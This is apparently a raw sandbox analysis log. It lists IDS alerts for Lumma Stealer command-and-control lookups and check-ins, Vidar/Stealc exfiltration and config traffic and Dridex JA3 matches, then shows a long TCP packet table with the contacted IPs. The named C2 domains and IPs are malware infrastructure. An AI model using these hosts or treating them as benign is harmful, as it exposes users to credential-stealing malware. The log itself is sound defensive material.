                                                                                    2024-09-27T00:14:56.945373+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497585.75.211.162443TCP
                                                                                    2024-09-27T00:14:58.287500+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497595.75.211.162443TCP
                                                                                    2024-09-27T00:14:59.736675+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497605.75.211.162443TCP
                                                                                    2024-09-27T00:15:01.765713+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497625.75.211.162443TCP
                                                                                    2024-09-27T00:15:03.802303+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497635.75.211.162443TCP
                                                                                    2024-09-27T00:15:06.278834+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449764147.45.44.10480TCP
                                                                                    2024-09-27T00:15:07.166816+02002056176ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)1192.168.2.4525681.1.1.153UDP
                                                                                    2024-09-27T00:15:07.669123+02002056177ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)1192.168.2.449766104.21.36.139443TCP
                                                                                    2024-09-27T00:15:07.750779+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497655.75.211.162443TCP
                                                                                    2024-09-27T00:15:08.133125+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449766104.21.36.139443TCP
                                                                                    2024-09-27T00:15:08.133125+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449766104.21.36.139443TCP
                                                                                    2024-09-27T00:15:08.163096+02002056164ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)1192.168.2.4518771.1.1.153UDP
                                                                                    2024-09-27T00:15:08.654623+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.449767104.21.4.136443TCP
                                                                                    2024-09-27T00:15:08.898249+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449764147.45.44.10480TCP
                                                                                    2024-09-27T00:15:09.096642+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449767104.21.4.136443TCP
                                                                                    2024-09-27T00:15:09.096642+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449767104.21.4.136443TCP
                                                                                    2024-09-27T00:15:09.100767+02002056162ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)1192.168.2.4629771.1.1.153UDP
                                                                                    2024-09-27T00:15:09.585800+02002056163ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)1192.168.2.449768188.114.97.3443TCP
                                                                                    2024-09-27T00:15:09.941873+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497695.75.211.162443TCP
                                                                                    2024-09-27T00:15:10.034198+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449768188.114.97.3443TCP
                                                                                    2024-09-27T00:15:10.034198+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449768188.114.97.3443TCP
                                                                                    2024-09-27T00:15:10.038406+02002056160ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)1192.168.2.4562401.1.1.153UDP
                                                                                    2024-09-27T00:15:10.771432+02002056161ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)1192.168.2.449770188.114.96.3443TCP
                                                                                    2024-09-27T00:15:11.279313+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449764147.45.44.10480TCP
                                                                                    2024-09-27T00:15:11.283870+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449770188.114.96.3443TCP
                                                                                    2024-09-27T00:15:11.283870+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449770188.114.96.3443TCP
                                                                                    2024-09-27T00:15:11.287488+02002056158ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)1192.168.2.4499811.1.1.153UDP
                                                                                    2024-09-27T00:15:11.885423+02002056159ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)1192.168.2.449771188.114.97.3443TCP
                                                                                    2024-09-27T00:15:12.068341+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497725.75.211.162443TCP
                                                                                    2024-09-27T00:15:12.490926+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449771188.114.97.3443TCP
                                                                                    2024-09-27T00:15:12.490926+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449771188.114.97.3443TCP
                                                                                    2024-09-27T00:15:12.494857+02002056156ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)1192.168.2.4646981.1.1.153UDP
                                                                                    2024-09-27T00:15:12.983938+02002056157ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)1192.168.2.449773172.67.162.108443TCP
                                                                                    2024-09-27T00:15:13.438318+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449773172.67.162.108443TCP
                                                                                    2024-09-27T00:15:13.438318+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449773172.67.162.108443TCP
                                                                                    2024-09-27T00:15:13.448159+02002056154ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)1192.168.2.4634601.1.1.153UDP
                                                                                    2024-09-27T00:15:13.690540+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497755.75.211.162443TCP
                                                                                    2024-09-27T00:15:13.935923+02002056155ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)1192.168.2.449776188.114.96.3443TCP
                                                                                    2024-09-27T00:15:14.346648+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449776188.114.96.3443TCP
                                                                                    2024-09-27T00:15:14.346648+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449776188.114.96.3443TCP
                                                                                    2024-09-27T00:15:14.396934+02002056152ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)1192.168.2.4518591.1.1.153UDP
                                                                                    2024-09-27T00:15:14.911440+02002056153ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)1192.168.2.449777188.114.97.3443TCP
                                                                                    2024-09-27T00:15:16.084795+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.44977845.132.206.25180TCP
                                                                                    2024-09-27T00:15:16.089236+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449777188.114.97.3443TCP
                                                                                    2024-09-27T00:15:16.089236+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449777188.114.97.3443TCP
                                                                                    2024-09-27T00:15:16.207474+02002056150ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)1192.168.2.4651081.1.1.153UDP
                                                                                    2024-09-27T00:15:16.707368+02002056151ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)1192.168.2.449779172.67.208.139443TCP
                                                                                    2024-09-27T00:15:18.168845+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449779172.67.208.139443TCP
                                                                                    2024-09-27T00:15:18.168845+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449779172.67.208.139443TCP
                                                                                    2024-09-27T00:15:20.558599+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449781172.67.128.144443TCP
                                                                                    2024-09-27T00:15:20.558599+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449781172.67.128.144443TCP
                                                                                    2024-09-27T00:15:35.086446+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449783104.26.13.20580TCP
                                                                                    2024-09-27T00:15:41.429971+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497875.75.211.162443TCP
                                                                                    2024-09-27T00:15:42.919658+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497885.75.211.162443TCP
                                                                                    2024-09-27T00:15:44.282336+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497895.75.211.162443TCP
                                                                                    2024-09-27T00:15:45.645028+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497905.75.211.162443TCP
                                                                                    2024-09-27T00:15:46.345317+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config15.75.211.162443192.168.2.449790TCP
                                                                                    2024-09-27T00:15:46.991366+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497915.75.211.162443TCP
                                                                                    2024-09-27T00:15:47.697227+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M115.75.211.162443192.168.2.449791TCP
                                                                                    2024-09-27T00:15:48.434558+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497925.75.211.162443TCP
                                                                                    2024-09-27T00:15:49.449684+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497935.75.211.162443TCP
                                                                                    2024-09-27T00:15:52.774428+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497945.75.211.162443TCP
                                                                                    2024-09-27T00:15:53.759540+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.4497955.75.211.162443TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Sep 27, 2024 00:14:26.445635080 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:26.445672035 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:26.445838928 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:26.504301071 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:26.504327059 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.147586107 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.147851944 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.315742016 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.315773964 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.316253901 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.316366911 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.366628885 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.407406092 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.786350965 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.786375046 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.786387920 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.786540985 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.786555052 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.786600113 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.891187906 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.891211987 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.891295910 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.891295910 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.891309023 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.891401052 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.900458097 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.900563955 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.900599003 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.900635958 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.900980949 CEST49739443192.168.2.4104.102.49.254
                                                                                    Sep 27, 2024 00:14:27.900994062 CEST44349739104.102.49.254192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.911252975 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:27.911315918 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:27.911411047 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:27.911685944 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:27.911705017 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:28.857217073 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:28.857368946 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:28.860929012 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:28.860939026 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:28.861196995 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:28.861257076 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:28.861608028 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:28.903404951 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:29.359797001 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:29.359978914 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:29.360027075 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:29.360047102 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:29.362205029 CEST49740443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:29.362220049 CEST443497405.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:29.364593029 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:29.364624023 CEST443497415.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:29.364722013 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:29.365035057 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:29.365046978 CEST443497415.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:30.047175884 CEST443497415.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:30.047301054 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.048105955 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.048113108 CEST443497415.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:30.049752951 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.049760103 CEST443497415.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:30.756894112 CEST443497415.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:30.756978989 CEST443497415.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:30.757024050 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.757024050 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.757435083 CEST49741443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.757450104 CEST443497415.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:30.759418011 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.759440899 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:30.759623051 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.759989977 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:30.759999037 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:31.424307108 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:31.424413919 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:31.424855947 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:31.424865007 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:31.427110910 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:31.427118063 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.133050919 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.133096933 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.133230925 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.133357048 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.133357048 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.133357048 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.134823084 CEST49742443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.134835958 CEST443497425.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.135627031 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.135665894 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.135736942 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.135968924 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.135982990 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.792817116 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.792949915 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.793565035 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.793576002 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:32.795480013 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:32.795485020 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:33.488488913 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:33.488516092 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:33.488571882 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:33.488576889 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:33.488595963 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:33.488643885 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:33.489023924 CEST49743443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:33.489039898 CEST443497435.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:33.490787983 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:33.490827084 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:33.490919113 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:33.491152048 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:33.491173983 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.149432898 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.149527073 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.150264978 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.150278091 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.152430058 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.152436972 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.838385105 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.838455915 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.838488102 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.838502884 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.838545084 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.838560104 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.838681936 CEST49744443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.838700056 CEST443497445.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.906521082 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.906567097 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:34.906660080 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.906874895 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:34.906896114 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:35.560719967 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:35.562421083 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:35.562977076 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:35.562994957 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:35.564766884 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:35.564773083 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:35.564821959 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:35.564847946 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:35.899736881 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:35.899785995 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:35.899904966 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:35.900243044 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:35.900279999 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:36.337163925 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:36.337270975 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:36.337300062 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:36.337338924 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:36.337352037 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:36.337392092 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:36.338334084 CEST49745443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:36.338351011 CEST443497455.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:36.581496000 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:36.581588984 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:36.582218885 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:36.582230091 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:36.583991051 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:36.584002972 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.021393061 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.021454096 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.021512032 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.021637917 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.021662951 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.021677971 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.021724939 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.052778959 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.052800894 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.052915096 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.052927017 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.052949905 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.052973032 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.119308949 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.119362116 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.119481087 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.119504929 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.119517088 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.119549036 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.150248051 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.150294065 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.150363922 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.150377035 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.150408030 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.150422096 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.188200951 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.188297987 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.188350916 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.188364983 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.188402891 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.188419104 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.219180107 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.219228983 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.219265938 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.219294071 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.219310045 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.219645023 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.238688946 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.238735914 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.238763094 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.238787889 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.238806009 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.238832951 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.257195950 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.257220030 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.257273912 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.257301092 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.257316113 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.257343054 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.274967909 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.274988890 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.275049925 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.275063038 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.275085926 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.275109053 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.291843891 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.291891098 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.291938066 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.291953087 CEST443497465.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:37.291970015 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.296200037 CEST49746443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:37.307729006 CEST443497465.75.211.162192.168.2.4
